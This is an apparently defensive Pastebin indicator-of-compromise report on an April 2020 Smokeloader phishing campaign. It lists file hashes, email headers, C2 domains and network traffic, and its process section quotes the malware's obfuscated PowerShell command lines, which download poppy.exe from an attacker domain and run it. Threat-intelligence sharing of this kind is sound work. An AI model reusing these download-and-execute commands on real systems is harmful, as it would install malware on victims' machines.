Advertisement
VRad

#smokeloader_070420

Apr 9th, 2020
8,019
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.23 KB | None | 0 0
  1. #IOC #OptiData #VR #smokeloader #LZH #WSH #vmdetect
  2.  
  3. https://pastebin.com/EagNZxKf
  4.  
  5. previous_contact:
  6. https://pastebin.com/QpG70u8T
  7. https://pastebin.com/BJzcXqkK
  8. https://pastebin.com/kBW7nkZ5
  9. https://pastebin.com/Z7zq0YkW
  10. https://pastebin.com/b8PkhMyN
  11. https://pastebin.com/hkskwKvc
  12. https://pastebin.com/JmthzrL4
  13. https://pastebin.com/1scwT0f8
  14. https://pastebin.com/MP3kCSSh
  15.  
  16. FAQ:
  17. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  18. https://research.checkpoint.com/2019-resurgence-of-smokeloader/
  19.  
  20. attack_vector
  21. --------------
  22. email attach .RAR (LHa/LZH) > JS > WSH > PowerShell > GET 1URL > exe
  23.  
  24. email_headers
  25. --------------
  26. Received: from hosting.wildpark.net (hosting.wildpark.net [217.77.208.228])
  27. Received: from [127.0.0.1] (unknown [148.251.234.93])
  28. by hosting.wildpark.net (Postfix) with ESMTPA id 7C920200037A
  29. Subject: Re: Задержка по оплате
  30. Message-Id: <[email protected]>
  31. Date: Tue, 7 Apr 2020 05:10:22 +0300
  32. X-Mailer: iPhone Mail (13E238)
  33. X-FEAS-CLIENT-IP: 217.77.208.228
  34. Return-Path: [email protected]
  35.  
  36. files
  37. --------------
  38. SHA-256 9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e
  39. File name План від 05.04.2020р.rar [ LHa (2.x)/LHark archive data [lh7] - header level 0 ]
  40. File size 6.69 KB (6852 bytes)
  41.  
  42. SHA-256 cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854
  43. File name pax_05.04.2020à..js [ JavaScript ]
  44. File size 19.80 KB (20278 bytes)
  45.  
  46. SHA-256 4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b
  47. File name poppy.exe [PE32 executable for MS Windows (GUI) Intel 80386 32-bit]
  48. File size 147.00 KB (150528 bytes)
  49.  
  50. SHA-256 8d16d5caad71aaaaa1479f8477d2928b66581c79932a49a21edf93db2803ab9c
  51. File name 9419.tmp (ntdll.dll) [clean, droped to %temp%, Microsoft Visual C++ vx.x DLL ]
  52. File size 1.23 MB (1292192 bytes)
  53.  
  54. activity
  55. **************
  56. PL_SCR http://scproducts7.ru/availableupdatemanager/poppy.exe
  57.  
  58. C2 amfibiyapolyakova{.} com - thnx for @JAMESWT_MHT
  59. amfibiyapolyakova{.} com - sinkholed (CyS Centrum)
  60. siciliyaopartion{.} ru - sinkholed (CyS Centrum)
  61. opetileon{.} ru - sinkholed (CyS Centrum)
  62. crocopexpire{.} ug - sinkholed (CyS Centrum)
  63. yamaha{.} ug - sinkholed (CyS Centrum)
  64. informatioshopname{.} ru - thnx for CyS Centrum
  65.  
  66. netwrk
  67. --------------
  68. [http]
  69. 8.208.91.58 scproducts7.ru GET /availableupdatemanager/poppy.exe HTTP/1.1 Google Chrome
  70. (!) !This program cannot be run in DOS mode.
  71. 185.14.31.88 amfibiyapolyakova.com POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0
  72.  
  73. [ssl]
  74. 204.79.197.200 www.bing.com Client Hello
  75.  
  76. comp
  77. --------------
  78. powershell.exe 8.208.91.58 scproducts7.ru
  79. explorer.exe 185.14.31.88 amfibiyapolyakova.com
  80.  
  81. proc
  82. --------------
  83. C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_05.04.2020à..js
  84.  
  85. C:\Windows\System32\cmd.exe" /c iwbDyExnfhFHuWV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','%temp%WHk58.exe'); & %temp%WHk58.exe & CXorbhFlHAGsKcP
  86.  
  87. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','C:\tmpWHk58.exe');
  88.  
  89. C:\tmpWHk58.exe
  90.  
  91. persist
  92. --------------
  93. n/a
  94.  
  95. drop
  96. --------------
  97. C:\tmpWHk58.exe
  98. %temp%\9419.tmp
  99. %temp%\se3mut05.g01.ps1
  100. %temp%\nsfka0oj.3qd.psm1
  101. C:\Users\operator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  102.  
  103. # # #
  104. https://www.virustotal.com/gui/file/9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e/details
  105. https://www.virustotal.com/gui/file/cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854/details
  106. https://www.virustotal.com/gui/file/4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b/details
  107. https://analyze.intezer.com/#/analyses/2ad8aa89-9449-4ea1-80d3-e2513c1ff7f6
  108.  
  109. VR
  110.  
  111. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement